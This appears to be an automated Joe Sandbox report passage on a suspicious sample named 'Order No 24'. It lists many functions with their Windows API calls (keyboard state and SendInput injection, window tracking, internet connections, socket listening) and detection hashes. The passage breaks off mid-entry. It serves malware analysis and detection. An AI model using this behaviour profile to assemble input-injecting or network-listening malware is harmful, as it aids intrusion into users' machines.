                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                  • Opcode ID: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                                                                                                                  • Instruction ID: f8114fe27cc30cd16a31e7187209b9f9113c09ee70af26d1a7397635c161ae32
                                                                                                                                  • Opcode Fuzzy Hash: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                                                                                                                  • Instruction Fuzzy Hash: F75196B5900249EFCF11DFA9C880AAE77B9FF85720F108659F89597291D730ED82CB50
                                                                                                                                  Function 009BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009BC462
                                                                                                                                  • __itow.LIBCMT ref: 009BC49C
                                                                                                                                    • Part of subcall function 009BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009BC753
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009BC505
                                                                                                                                  • __itow.LIBCMT ref: 009BC55A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  • Opcode ID: ed3f557524793a66cad4019ad6ac6e2e9eb61a0212d648eac60098f3d6950ea7
                                                                                                                                  • Instruction ID: 519e3f4d66e97b5f5844373589aa1c59ddf60e0cdec928e1f90033f5ba8b617a
                                                                                                                                  • Opcode Fuzzy Hash: ed3f557524793a66cad4019ad6ac6e2e9eb61a0212d648eac60098f3d6950ea7
                                                                                                                                  • Instruction Fuzzy Hash: 9841FAB1A00609AFDF21EF54CD56FEE7BB9AF89710F000019F905A7291DB749A49CBA1
                                                                                                                                  Function 009C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009C3966
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 009C3982
                                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009C39EF
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 009C3A4D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  • Opcode ID: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
                                                                                                                                  • Instruction ID: 467051ae2ab1b8dfd6b6590aa1481791d63a8161f966ccd3a7cbab34fe2022fa
                                                                                                                                  • Opcode Fuzzy Hash: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
                                                                                                                                  • Instruction Fuzzy Hash: 5F41F570E04248EAEF308BA48805FFDBBB99B59310F04C15EE4C1A22D1C7B49E95D767
                                                                                                                                  Function 009EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009EB5D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
                                                                                                                                  • Instruction ID: 7fefc89ed04bac5aa17eecd9363550ea6355d8c097c0571b4415be2e9bedcd21
                                                                                                                                  • Opcode Fuzzy Hash: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
                                                                                                                                  • Instruction Fuzzy Hash: 44313378601288BFEF22CF9ACC88FAE7768EB06720F104502F601D61E1CB34ED418B51
                                                                                                                                  Function 009ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009ED807
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009ED87D
                                                                                                                                  • PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 009ED8FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                  • Opcode ID: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
                                                                                                                                  • Instruction ID: c323c19567719a00e549de4c53b79ee95312edea4ecf49a817fe3beaf8c77411
                                                                                                                                  • Opcode Fuzzy Hash: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
                                                                                                                                  • Instruction Fuzzy Hash: E941C278A01299DFCB12DF9AC884B69BBF9FF85310F1981A9E414CB251D331ED42CB41
                                                                                                                                  Function 009C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 009C3AB8
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 009C3AD4
                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 009C3B34
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 009C3B92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  • Opcode ID: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
                                                                                                                                  • Instruction ID: 483bea4e439c41a9839b1455b5b3ae5cdb5cd2e4aecd67e9d602a0fa22632e57
                                                                                                                                  • Opcode Fuzzy Hash: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
                                                                                                                                  • Instruction Fuzzy Hash: 0A312471E00258AEEF209BA48819FFE7BB99B55310F04C15EE481A32D1C7759F46D763
                                                                                                                                  Function 009B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B4038
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 009B4066
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B4094
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B40CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  • Opcode ID: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
                                                                                                                                  • Instruction ID: 8b4c0a4d6227ca08d354224eaad4e938d974d34d6bacbdb365c3c3a36273ff79
                                                                                                                                  • Opcode Fuzzy Hash: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
                                                                                                                                  • Instruction Fuzzy Hash: E031B23160021AAFDB21EF74C945BFA7BB9FF41320F154528EA65871A2E731D891EB90
                                                                                                                                  Function 009E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 009E7CB9
                                                                                                                                    • Part of subcall function 009C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 009C5F6F
                                                                                                                                    • Part of subcall function 009C5F55: GetCurrentThreadId.KERNEL32 ref: 009C5F76
                                                                                                                                    • Part of subcall function 009C5F55: AttachThreadInput.USER32(00000000,?,009C781F), ref: 009C5F7D
                                                                                                                                  • GetCaretPos.USER32(?), ref: 009E7CCA
                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 009E7D03
                                                                                                                                  • GetForegroundWindow.USER32 ref: 009E7D09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                  • Opcode ID: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
                                                                                                                                  • Instruction ID: 7cbec740e6a5c9adb0da6a1b4f28c0b060de5650aa1fdfc92cef2c9d66c033c2
                                                                                                                                  • Opcode Fuzzy Hash: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
                                                                                                                                  • Instruction Fuzzy Hash: 6A310F72D00108AFDB01EFA9D845AEFBBF9EF94310B10846AE815E3211D6319E45CBA1
                                                                                                                                  Function 009EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EF211
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009FE4C0,?,?,?,?,?), ref: 009EF226
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EF270
                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009FE4C0,?,?,?), ref: 009EF2A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2864067406-0
                                                                                                                                  • Opcode ID: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                                                                                                                  • Instruction ID: e85f05f03a2b8b6e5b559ee0c56a4c30317a0a4f54f451558637eac4f04e100f
                                                                                                                                  • Opcode Fuzzy Hash: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                                                                                                                  • Instruction Fuzzy Hash: 7F219E39600018AFCB16CF99DC68EEABBB9EB4A310F04406AFA154B2A1D3359D52DB50
                                                                                                                                  Function 009D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D4358
                                                                                                                                    • Part of subcall function 009D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                                                                                                                    • Part of subcall function 009D43E2: InternetCloseHandle.WININET(00000000), ref: 009D449E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                  • Opcode ID: 8124469b37c2f026f11c5844ce73a11ebc6a8e6c2aeb553fa9417ee614a066b8
                                                                                                                                  • Instruction ID: 19d6a78dab12995e3cb8875631ba4a52004fe1d1e70dce81a4073e9eec273f9c
                                                                                                                                  • Opcode Fuzzy Hash: 8124469b37c2f026f11c5844ce73a11ebc6a8e6c2aeb553fa9417ee614a066b8
                                                                                                                                  • Instruction Fuzzy Hash: 7B21CF32280605BBEB119FA4DD00FBBF7ADFF84710F04801BBA1596750DB7198229BA0
                                                                                                                                  Function 009E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 009E8AA6
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8AC0
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8ACE
                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009E8ADC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                  • Opcode ID: 6937b39569b7429d4e7463a71d1115a1a8e0bfa78c0c01e2f9c251cb38c02a8a
                                                                                                                                  • Instruction ID: 98d12a3ac35bb865cc9133470e25ed8e8731bd74b80c6c6c94ac531ca68355ef
                                                                                                                                  • Opcode Fuzzy Hash: 6937b39569b7429d4e7463a71d1115a1a8e0bfa78c0c01e2f9c251cb38c02a8a
                                                                                                                                  • Instruction Fuzzy Hash: E911D032205115AFDB05AB99CC05FBB779DBF85320F144129F82AC72E2CB74AD028B90
                                                                                                                                  Function 009D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 009D8AE0
                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 009D8AF2
                                                                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 009D8AFF
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8B16
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                  • Opcode ID: 964026f4249e81cfb36591394a7706b1a5d8b817d6615f0cce9f2f5e89405363
                                                                                                                                  • Instruction ID: 9c3ad14196768b47c7df62150934a5bbf2594bfd67fcf21b8aea7e47ad078254
                                                                                                                                  • Opcode Fuzzy Hash: 964026f4249e81cfb36591394a7706b1a5d8b817d6615f0cce9f2f5e89405363
                                                                                                                                  • Instruction Fuzzy Hash: B8216672A00124AFC711DFA9C885A9E7BFCEF49350F00816AF849D7291DB74DA418F90
                                                                                                                                  Function 009C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1E77
                                                                                                                                    • Part of subcall function 009C1E68: lstrcpyW.KERNEL32(00000000,?,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C1E9D
                                                                                                                                    • Part of subcall function 009C1E68: lstrcmpiW.KERNEL32(00000000,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1ECE
                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AD4
                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AFA
                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0B2E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                  • String ID: cdecl
                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                  • Opcode ID: 6e61e09a43b02845c2bf92efbe312276fa3927b9e193d4bfd73b16207263cc9d
                                                                                                                                  • Instruction ID: e448c183f30af666d9468729e87302250749f4303711315c34d130f55fb7268e
                                                                                                                                  • Opcode Fuzzy Hash: 6e61e09a43b02845c2bf92efbe312276fa3927b9e193d4bfd73b16207263cc9d
                                                                                                                                  • Instruction Fuzzy Hash: AE117F36600305EFDB25AF64D845E7A77A8FF89354F80416AF906CB250EB719851C7A2
                                                                                                                                  Function 009B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 009B2FB5
                                                                                                                                    • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                                                                                                                    • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                                                                                                                    • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                  • Opcode ID: 8ecb1367392bdf1ce2d75846f33b60d6ba2d97d2cce37531995762eba4b4912c
                                                                                                                                  • Instruction ID: 875e41c5aa1513d468b45f44d1ea62f73f96e3eea17f2a2dda4e56d2f4060594
                                                                                                                                  • Opcode Fuzzy Hash: 8ecb1367392bdf1ce2d75846f33b60d6ba2d97d2cce37531995762eba4b4912c
                                                                                                                                  • Instruction Fuzzy Hash: 0A112C32409215ABCB317FF4AD057AA7BA8EF85370F208825F8499A251DB34CD4196D0
                                                                                                                                  Function 009C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
